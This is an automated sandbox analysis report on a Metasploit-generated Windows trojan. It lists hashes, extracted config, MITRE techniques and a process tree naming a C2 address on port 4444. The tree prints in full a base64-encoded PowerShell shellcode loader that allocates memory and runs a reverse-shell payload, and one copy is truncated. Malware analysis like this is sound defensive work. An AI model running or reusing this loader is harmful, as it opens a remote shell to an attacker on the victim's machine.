metasploit | ffea9176cfb8f8c009dfc8c1c4db6385e0155497dc42cd0e3dd356371c4089b8

General

Target

ffea9176cfb8f8c009dfc8c1c4db6385e0155497dc42cd0e3dd356371c4089b8.exe
Size

17KB
MD5

f8a9322518123f8dfa7e2e4b02e21656
SHA1

0f7fff304e0fe1a4bc0ca5eef9d34cdb6d2b43a9
SHA256

ffea9176cfb8f8c009dfc8c1c4db6385e0155497dc42cd0e3dd356371c4089b8
SHA512

fca2e548bb333ac59a4803ab783c5b4bfb466c5f7f59bcb787675db7c4444beafae9fe97beeb272c680f1573f204b864cd06a95cfcfb863e15f4c489732d3bae
SSDEEP

384:OEEoLO56ayzcMj+uZvAc00EUGvQPCcmL6neqlkXMj/79Wx:RE8O56lcVuGv0TPCcfexX+79Wx

Score

10^/10

metasploit backdoor discovery execution trojan

Malware Config

Extracted

Family

metasploit

Version

encoder/shikata_ga_nai

Extracted

Family

metasploit

Version

windows/reverse_tcp_dns

C2

190.130.88.59:4444

Signatures

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Metasploit family
metasploit

Blocklisted process makes network request 7 IoCs

flow	pid	Process
15	3044	powershell.exe
15	3044	powershell.exe
15	3044	powershell.exe
15	3044	powershell.exe
15	3044	powershell.exe
15	3044	powershell.exe
15	3044	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
3492	powershell.exe

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
3492	powershell.exe
3492	powershell.exe
3044	powershell.exe
3044	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	3492	powershell.exe
Token: SeDebugPrivilege	3044	powershell.exe

Suspicious use of WriteProcessMemory 13 IoCs

description	pid	Process	procid_target
PID 4056 wrote to memory of 1136	4056	ffea9176cfb8f8c009dfc8c1c4db6385e0155497dc42cd0e3dd356371c4089b8.exe	84
PID 4056 wrote to memory of 1136	4056	ffea9176cfb8f8c009dfc8c1c4db6385e0155497dc42cd0e3dd356371c4089b8.exe	84
PID 1136 wrote to memory of 3492	1136	cmd.exe	85
PID 1136 wrote to memory of 3492	1136	cmd.exe	85
PID 3492 wrote to memory of 3044	3492	powershell.exe	86
PID 3492 wrote to memory of 3044	3492	powershell.exe	86
PID 3492 wrote to memory of 3044	3492	powershell.exe	86
PID 3044 wrote to memory of 3020	3044	powershell.exe	90
PID 3044 wrote to memory of 3020	3044	powershell.exe	90
PID 3044 wrote to memory of 3020	3044	powershell.exe	90
PID 3020 wrote to memory of 468	3020	csc.exe	91
PID 3020 wrote to memory of 468	3020	csc.exe	91
PID 3020 wrote to memory of 468	3020	csc.exe	91

C:\Users\Admin\AppData\Local\Temp\ffea9176cfb8f8c009dfc8c1c4db6385e0155497dc42cd0e3dd356371c4089b8.exe
"C:\Users\Admin\AppData\Local\Temp\ffea9176cfb8f8c009dfc8c1c4db6385e0155497dc42cd0e3dd356371c4089b8.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4056
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -window hidden -EncodedCommand JAA5AFQARAAgAD0AIAAnACQAYgBNAFkASAAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHcAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABiAE0AWQBIACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGQAYgAsADAAeABjAGIALAAwAHgAYgBmACwAMAB4ADkANwAsADAAeAA5ADgALAAwAHgANQA1ACwAMAB4ADEAMAAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgANQBkACwAMAB4ADIAOQAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADUAMAAsADAAeAAzADEALAAwAHgANwBkACwAMAB4ADEAYQAsADAAeAA4ADMALAAwAHgAZQBkACwAMAB4AGYAYwAsADAAeAAwADMALAAwAHgANwBkACwAMAB4ADEANgAsADAAeABlADIALAAwAHgANgAyACwAMAB4ADYANAAsADAAeABiAGQALAAwAHgAOQBmACwAMAB4ADgAYwAsADAAeAA5ADUALAAwAHgAMwBlACwAMAB4AGMAMAAsADAAeABiAGQALAAwAHgANAA3ACwAMAB4ADUAYQAsADAAeAA4AGIALAAwAHgAZQBmACwAMAB4ADUANwAsADAAeAAyAGEALAAwAHgANgBlACwAMAB4ADgANAAsADAAeABjAGEALAAwAHgAMgAwACwAMAB4AGYAYQAsADAAeABjADgALAAwAHgAZgBlACwAMAB4ADAAOQAsADAAeAAwADMALAAwAHgAZQAzACwAMAB4ADQAOQAsADAAeAAyADMALAAwAHgAZABkACwAMAB4ADcAMAAsADAAeABjADcALAAwAHgAOQBjACwAMAB4ADEAMAAsADAAeAA0ADYALAAwAHgAOAA0ACwAMAB4AGUAMQAsADAAeAAzADMALAAwAHgAMwBhACwAMAB4AGQANwAsADAAeAAzADUALAAwAHgAOQA0ACwAMAB4ADAAMwAsADAAeAAxADgALAAwAHgANAA4ACwAMAB4AGQANQAsADAAeAA0ADQALAAwAHgAZQBlACwAMAB4ADIANgAsADAAeAAzAGEALAAwAHgAMQA4ACwAMAB4ADcAYQAsADAAeAA5AGEALAAwAHgAZAA0ACwAMAB4ADEANwAsADAAeAAzAGUALAAwAHgAMgA3ACwAMAB4AGQANAAsADAAeABmADcALAAwAHgAMwA0ACwAMAB4ADEANwAsADAAeABhAGUALAAwAHgAYQAwACwAMAB4AGMAZgAsADAAeAA1ADgALAAwAHgAMwBhACwAMAB4ADAAMgAsADAAeABkADEALAAwAHgAOAA4ACwAMAB4ADkAMwAsADAAeAAxADEALAAwAHgAOQA5ACwAMAB4ADMAMAAsADAAeAA5AGYALAAwAHgANwBkACwAMAB4ADMAYQAsADAAeAA0ADAALAAwAHgANABjACwAMAB4AGYAOAAsADAAeABmADMALAAwAHgAMwA2ACwAMAB4ADQAZQAsADAAeAA0AGIALAAwAHgAMwA1ACwAMAB4ADQAOAAsADAAeAAyADUALAAwAHgANwBmACwAMAB4AGIAZQAsADAAeABiADcALAAwAHgAZQBjACwAMAB4ADQAZQAsADAAeAAwADAALAAwAHgAMQBiACwAMAB4AGQAMQAsADAAeAA3AGYALAAwAHgAOABkACwAMAB4ADYANQAsADAAeAAxADUALAAwAHgANAA3ACwAMAB4ADYAZQAsADAAeAAxADAALAAwAHgANgBkACwAMAB4AGIANAAsADAAeAAxADMALAAwAHgAMgAzACwAMAB4AGIANgAsADAAeABjADcALAAwAHgAYwBmACwAMAB4AGEANgAsADAAeAAyADkALAAwAHgANgBmACwAMAB4ADkAYgAsADAAeAAxADEALAAwAHgAOABlACwAMAB4ADgAZQAsADAAeAA0ADgALAAwAHgAYwA3ACwAMAB4ADQANQAsADAAeAA5AGMALAAwAHgAMgA1ACwAMAB4ADgAMwAsADAAeAAwADIALAAwAHgAOAAwACwAMAB4AGIAOAAsADAAeAA0ADAALAAwAHgAMwA5ACwAMAB4AGIAYwAsADAAeAAzADEALAAwAHgANgA3ACwAMAB4AGUAZQAsADAAeAAzADUALAAwAHgAMAAxACwAMAB4ADQAYwAsADAAeAAyAGEALAAwAHgAMQBlACwAMAB4AGQAMQAsADAAeABlAGQALAAwAHgANgBiACwAMAB4AGYAYQAsADAAeABiADQALAAwAHgAMQAyACwAMAB4ADYAYgAsADAAeABhADIALAAwAHgANgA5ACwAMAB4AGIANwAsADAAeABlADcALAAwAHgANAAwACwAMAB4ADcAZgAsADAAeABjADcALAAwAHgAMAA3ACwAMAB4ADkAYgAsADAAeAA4ADAALAAwAHgAOQA1ACwAMAB4ADkAZgAsADAAeAA1ADAALAAwAHgANABkACwAMAB4ADIANgAsADAAeAA2ADAALAAwAHgAZgBlACwAMAB4AGMANgAsADAAeAA1ADUALAAwAHgANQAyACwAMAB4AGEAMQAsADAAeAA3AGMALAAwAHgAZgAyACwAMAB4AGQAZQAsADAAeAAyAGEALAAwAHgANQBiACwAMAB4ADAANQAsADAAeAAyADAALAAwAHgAMAAxACwAMAB4ADEAYgAsADAAeAA5ADkALAAwAHgAZABmACwAMAB4AGEAOQAsADAAeAA1AGMALAAwAHgAYgAzACwAMAB4ADEAYgAsADAAeABmAGQALAAwAHgAMABjACwAMAB4AGEAYgAsADAAeAA4AGEALAAwAHgANwBkACwAMAB4AGMANwAsADAAeAAyAGIALAAwAHgAMwAyACwAMAB4AGEAOAAsADAAeAA0ADgALAAwAHgANwBjACwAMAB4ADkAYwAsADAAeAAwADIALAAwAHgAMgA5ACwAMAB4ADIAYwAsADAAeAA1AGMALAAwAHgAZgAyACwAMAB4AGMAMQAsADAAeAAyADYALAAwAHgANQAzACwAMAB4ADIAZAAsADAAeABmADEALAAwAHgANAA4ACwAMAB4AGIAOQAsADAAeAA0ADYALAAwAHgAMQBhACwAMAB4AGIAOAAsADAAeAA0ADIALAAwAHgANgA4ACwAMAB4AGQAYgAsADAAeABmADQALAAwAHgANwBiACwAMAB4ADUAOAAsADAAeABmADUALAAwAHgAYwA3ACwAMAB4ADQAOAAsADAAeABhADgALAAwAHgAMgA3ACwAMAB4ADEAMAAsADAAeAA5ADcALAAwAHgAZQA2ACwAMAB4ADAAMgAsADAAeAA1ADkALAAwAHgAZQA3ACwAMAB4ADkAZQAsADAAeABjADUALAAwAHgAYgAxACwAMAB4AGQAMwAsADAAeABkAGUALAAwAHgAZQA5ACwAMAB4ADEANwAsADAAeAA5ADAALAAwAHgAOQBlACwAMAB4ADAAOQAsADAAeABmADIALAAwAHgAYQBkACwAMAB4ADQAZQAsADAAeAA1AGEALAAwAHgAMAAwACwAMAB4AGIAMgAsADAAeAA3AGYALAAwAHgAYwA2ACwAMAB4ADgAZAAsADAAeAA1ADQALAAwAHgAMQA1ACwAMAB4AGUANgAsADAAeABkAGIALAAwAHgAYwBmACwAMAB4ADgAMQAsADAAeAA5AGYALAAwAHgANAAxACwAMAB4ADkAYgAsADAAeAAzADAALAAwAHgANQBmACwAMAB4ADUAYwAsADAAeABlADEALAAwAHgANwAyACwAMAB4AGUAYgAsADAAeAA1ADMALAAwAHgAMQA1ACwAMAB4ADMAYwAsADAAeAAxAGMALAAwAHgAMQA5ACwAMAB4ADAANQAsADAAeABhADgALAAwAHgAZQBjACwAMAB4ADUANAAsADAAeAA3ADcALAAwAHgANwBlACwAMAB4AGYAMgAsADAAeAA0ADIALAAwAHgAMQAyACwAMAB4ADcAZQAsADAAeAA2ADYALAAwAHgANgA5ACwAMAB4AGIANQAsADAAeAAyADkALAAwAHgAMQBlACwAMAB4ADcAMwAsADAAeABlADAALAAwAHgAMQBkACwAMAB4ADgAMQAsADAAeAA4AGMALAAwAHgAYwA3ACwAMAB4ADEANgAsADAAeAAwADgALAAwAHgAMQA5ACwAMAB4AGEAOAAsADAAeAA0ADAALAAwAHgANwA1ACwAMAB4AGMAZAAsADAAeAAyADgALAAwAHgAOQAwACwAMAB4ADIAMwAsADAAeAA4ADcALAAwAHgAMgA4ACwAMAB4AGYAOAAsADAAeAA5ADMALAAwAHgAZgAzACwAMAB4ADcAYQAsADAAeAAxAGQALAAwAHgAZABjACwAMAB4ADIAOQAsADAAeABlAGYALAAwAHgAOABlACwAMAB4ADQAOQAsADAAeABkADIALAAwAHgANAA2ACwAMAB4ADYAMwAsADAAeABkADkALAAwAHgAYgBhACwAMAB4ADYANAAsADAAeAA1AGEALAAwAHgAMgBkACwAMAB4ADYANQAsADAAeAA5ADYALAAwAHgAOAA5ACwAMAB4AGEAZgAsADAAeAA1ADkALAAwAHgANAAxACwAMAB4AGYANwAsADAAeABjADUALAAwAHgAYgAzACwAMAB4ADUAMQA7ACQAZwAgAD0AIAAwAHgAMQAwADAAMAA7AGkAZgAgACgAJAB6AC4ATABlAG4AZwB0AGgAIAAtAGcAdAAgADAAeAAxADAAMAAwACkAewAkAGcAIAA9ACAAJAB6AC4ATABlAG4AZwB0AGgAfQA7ACQAcQBTAFkAPQAkAHcAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABnACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgACgAJAB6AC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAHEAUwBZAC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAGkAKQAsACAAJAB6AFsAJABpAF0ALAAgADEAKQB9ADsAJAB3ADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABxAFMAWQAsADAALAAwACwAMAApADsAZgBvAHIAIAAoADsAOwApAHsAUwB0AGEAcgB0AC0AcwBsAGUAZQBwACAANgAwAH0AOwAnADsAJABlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABlAHMAKAAkADkAVABEACkAKQA7ACQATwAzAFgAIAA9ACAAIgAtAGUAbgBjACAAIgA7AGkAZgAoAFsASQBuAHQAUAB0AHIAXQA6ADoAUwBpAHoAZQAgAC0AZQBxACAAOAApAHsAJABXAGYATABnACAAPQAgACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0ACAAKwAgACIAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAiADsAaQBlAHgAIAAiACYAIAAkAFcAZgBMAGcAIAAkAE8AMwBYACAAJABlACIAfQBlAGwAcwBlAHsAOwBpAGUAeAAgACIAJgAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAkAE8AMwBYACAAJABlACIAOwB9AA==
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1136
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -window hidden -EncodedCommand JAA5AFQARAAgAD0AIAAnACQAYgBNAFkASAAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHcAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABiAE0AWQBIACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGQAYgAsADAAeABjAGIALAAwAHgAYgBmACwAMAB4ADkANwAsADAAeAA5ADgALAAwAHgANQA1ACwAMAB4ADEAMAAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgANQBkACwAMAB4ADIAOQAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADUAMAAsADAAeAAzADEALAAwAHgANwBkACwAMAB4ADEAYQAsADAAeAA4ADMALAAwAHgAZQBkACwAMAB4AGYAYwAsADAAeAAwADMALAAwAHgANwBkACwAMAB4ADEANgAsADAAeABlADIALAAwAHgANgAyACwAMAB4ADYANAAsADAAeABiAGQALAAwAHgAOQBmACwAMAB4ADgAYwAsADAAeAA5ADUALAAwAHgAMwBlACwAMAB4AGMAMAAsADAAeABiAGQALAAwAHgANAA3ACwAMAB4ADUAYQAsADAAeAA4AGIALAAwAHgAZQBmACwAMAB4ADUANwAsADAAeAAyAGEALAAwAHgANgBlACwAMAB4ADgANAAsADAAeABjAGEALAAwAHgAMgAwACwAMAB4AGYAYQAsADAAeABjADgALAAwAHgAZgBlACwAMAB4ADAAOQAsADAAeAAwADMALAAwAHgAZQAzACwAMAB4ADQAOQAsADAAeAAyADMALAAwAHgAZABkACwAMAB4ADcAMAAsADAAeABjADcALAAwAHgAOQBjACwAMAB4ADEAMAAsADAAeAA0ADYALAAwAHgAOAA0ACwAMAB4AGUAMQAsADAAeAAzADMALAAwAHgAMwBhACwAMAB4AGQANwAsADAAeAAzADUALAAwAHgAOQA0ACwAMAB4ADAAMwAsADAAeAAxADgALAAwAHgANAA4ACwAMAB4AGQANQAsADAAeAA0ADQALAAwAHgAZQBlACwAMAB4ADIANgAsADAAeAAzAGEALAAwAHgAMQA4ACwAMAB4ADcAYQAsADAAeAA5AGEALAAwAHgAZAA0ACwAMAB4ADEANwAsADAAeAAzAGUALAAwAHgAMgA3ACwAMAB4AGQANAAsADAAeABmADcALAAwAHgAMwA0ACwAMAB4ADEANwAsADAAeABhAGUALAAwAHgAYQAwACwAMAB4AGMAZgAsADAAeAA1ADgALAAwAHgAMwBhACwAMAB4ADAAMgAsADAAeABkADEALAAwAHgAOAA4ACwAMAB4ADkAMwAsADAAeAAxADEALAAwAHgAOQA5ACwAMAB4ADMAMAAsADAAeAA5AGYALAAwAHgANwBkACwAMAB4ADMAYQAsADAAeAA0ADAALAAwAHgANABjACwAMAB4AGYAOAAsADAAeABmADMALAAwAHgAMwA2ACwAMAB4ADQAZQAsADAAeAA0AGIALAAwAHgAMwA1ACwAMAB4ADQAOAAsADAAeAAyADUALAAwAHgANwBmACwAMAB4AGIAZQAsADAAeABiADcALAAwAHgAZQBjACwAMAB4ADQAZQAsADAAeAAwADAALAAwAHgAMQBiACwAMAB4AGQAMQAsADAAeAA3AGYALAAwAHgAOABkACwAMAB4ADYANQAsADAAeAAxADUALAAwAHgANAA3ACwAMAB4ADYAZQAsADAAeAAxADAALAAwAHgANgBkACwAMAB4AGIANAAsADAAeAAxADMALAAwAHgAMgAzACwAMAB4AGIANgAsADAAeABjADcALAAwAHgAYwBmACwAMAB4AGEANgAsADAAeAAyADkALAAwAHgANgBmACwAMAB4ADkAYgAsADAAeAAxADEALAAwAHgAOABlACwAMAB4ADgAZQAsADAAeAA0ADgALAAwAHgAYwA3ACwAMAB4ADQANQAsADAAeAA5AGMALAAwAHgAMgA1ACwAMAB4ADgAMwAsADAAeAAwADIALAAwAHgAOAAwACwAMAB4AGIAOAAsADAAeAA0ADAALAAwAHgAMwA5ACwAMAB4AGIAYwAsADAAeAAzADEALAAwAHgANgA3ACwAMAB4AGUAZQAsADAAeAAzADUALAAwAHgAMAAxACwAMAB4ADQAYwAsADAAeAAyAGEALAAwAHgAMQBlACwAMAB4AGQAMQAsADAAeABlAGQALAAwAHgANgBiACwAMAB4AGYAYQAsADAAeABiADQALAAwAHgAMQAyACwAMAB4ADYAYgAsADAAeABhADIALAAwAHgANgA5ACwAMAB4AGIANwAsADAAeABlADcALAAwAHgANAAwACwAMAB4ADcAZgAsADAAeABjADcALAAwAHgAMAA3ACwAMAB4ADkAYgAsADAAeAA4ADAALAAwAHgAOQA1ACwAMAB4ADkAZgAsADAAeAA1ADAALAAwAHgANABkACwAMAB4ADIANgAsADAAeAA2ADAALAAwAHgAZgBlACwAMAB4AGMANgAsADAAeAA1ADUALAAwAHgANQAyACwAMAB4AGEAMQAsADAAeAA3AGMALAAwAHgAZgAyACwAMAB4AGQAZQAsADAAeAAyAGEALAAwAHgANQBiACwAMAB4ADAANQAsADAAeAAyADAALAAwAHgAMAAxACwAMAB4ADEAYgAsADAAeAA5ADkALAAwAHgAZABmACwAMAB4AGEAOQAsADAAeAA1AGMALAAwAHgAYgAzACwAMAB4ADEAYgAsADAAeABmAGQALAAwAHgAMABjACwAMAB4AGEAYgAsADAAeAA4AGEALAAwAHgANwBkACwAMAB4AGMANwAsADAAeAAyAGIALAAwAHgAMwAyACwAMAB4AGEAOAAsADAAeAA0ADgALAAwAHgANwBjACwAMAB4ADkAYwAsADAAeAAwADIALAAwAHgAMgA5ACwAMAB4ADIAYwAsADAAeAA1AGMALAAwAHgAZgAyACwAMAB4AGMAMQAsADAAeAAyADYALAAwAHgANQAzACwAMAB4ADIAZAAsADAAeABmADEALAAwAHgANAA4ACwAMAB4AGIAOQAsADAAeAA0ADYALAAwAHgAMQBhACwAMAB4AGIAOAAsADAAeAA0ADIALAAwAHgANgA4ACwAMAB4AGQAYgAsADAAeABmADQALAAwAHgANwBiACwAMAB4ADUAOAAsADAAeABmADUALAAwAHgAYwA3ACwAMAB4ADQAOAAsADAAeABhADgALAAwAHgAMgA3ACwAMAB4ADEAMAAsADAAeAA5ADcALAAwAHgAZQA2ACwAMAB4ADAAMgAsADAAeAA1ADkALAAwAHgAZQA3ACwAMAB4ADkAZQAsADAAeABjADUALAAwAHgAYgAxACwAMAB4AGQAMwAsADAAeABkAGUALAAwAHgAZQA5ACwAMAB4ADEANwAsADAAeAA5ADAALAAwAHgAOQBlACwAMAB4ADAAOQAsADAAeABmADIALAAwAHgAYQBkACwAMAB4ADQAZQAsADAAeAA1AGEALAAwAHgAMAAwACwAMAB4AGIAMgAsADAAeAA3AGYALAAwAHgAYwA2ACwAMAB4ADgAZAAsADAAeAA1ADQALAAwAHgAMQA1ACwAMAB4AGUANgAsADAAeABkAGIALAAwAHgAYwBmACwAMAB4ADgAMQAsADAAeAA5AGYALAAwAHgANAAxACwAMAB4ADkAYgAsADAAeAAzADAALAAwAHgANQBmACwAMAB4ADUAYwAsADAAeABlADEALAAwAHgANwAyACwAMAB4AGUAYgAsADAAeAA1ADMALAAwAHgAMQA1ACwAMAB4ADMAYwAsADAAeAAxAGMALAAwAHgAMQA5ACwAMAB4ADAANQAsADAAeABhADgALAAwAHgAZQBjACwAMAB4ADUANAAsADAAeAA3ADcALAAwAHgANwBlACwAMAB4AGYAMgAsADAAeAA0ADIALAAwAHgAMQAyACwAMAB4ADcAZQAsADAAeAA2ADYALAAwAHgANgA5ACwAMAB4AGIANQAsADAAeAAyADkALAAwAHgAMQBlACwAMAB4ADcAMwAsADAAeABlADAALAAwAHgAMQBkACwAMAB4ADgAMQAsADAAeAA4AGMALAAwAHgAYwA3ACwAMAB4ADEANgAsADAAeAAwADgALAAwAHgAMQA5ACwAMAB4AGEAOAAsADAAeAA0ADAALAAwAHgANwA1ACwAMAB4AGMAZAAsADAAeAAyADgALAAwAHgAOQAwACwAMAB4ADIAMwAsADAAeAA4ADcALAAwAHgAMgA4ACwAMAB4AGYAOAAsADAAeAA5ADMALAAwAHgAZgAzACwAMAB4ADcAYQAsADAAeAAxAGQALAAwAHgAZABjACwAMAB4ADIAOQAsADAAeABlAGYALAAwAHgAOABlACwAMAB4ADQAOQAsADAAeABkADIALAAwAHgANAA2ACwAMAB4ADYAMwAsADAAeABkADkALAAwAHgAYgBhACwAMAB4ADYANAAsADAAeAA1AGEALAAwAHgAMgBkACwAMAB4ADYANQAsADAAeAA5ADYALAAwAHgAOAA5ACwAMAB4AGEAZgAsADAAeAA1ADkALAAwAHgANAAxACwAMAB4AGYANwAsADAAeABjADUALAAwAHgAYgAzACwAMAB4ADUAMQA7ACQAZwAgAD0AIAAwAHgAMQAwADAAMAA7AGkAZgAgACgAJAB6AC4ATABlAG4AZwB0AGgAIAAtAGcAdAAgADAAeAAxADAAMAAwACkAewAkAGcAIAA9ACAAJAB6AC4ATABlAG4AZwB0AGgAfQA7ACQAcQBTAFkAPQAkAHcAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABnACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgACgAJAB6AC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAHEAUwBZAC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAGkAKQAsACAAJAB6AFsAJABpAF0ALAAgADEAKQB9ADsAJAB3ADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABxAFMAWQAsADAALAAwACwAMAApADsAZgBvAHIAIAAoADsAOwApAHsAUwB0AGEAcgB0AC0AcwBsAGUAZQBwACAANgAwAH0AOwAnADsAJABlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHM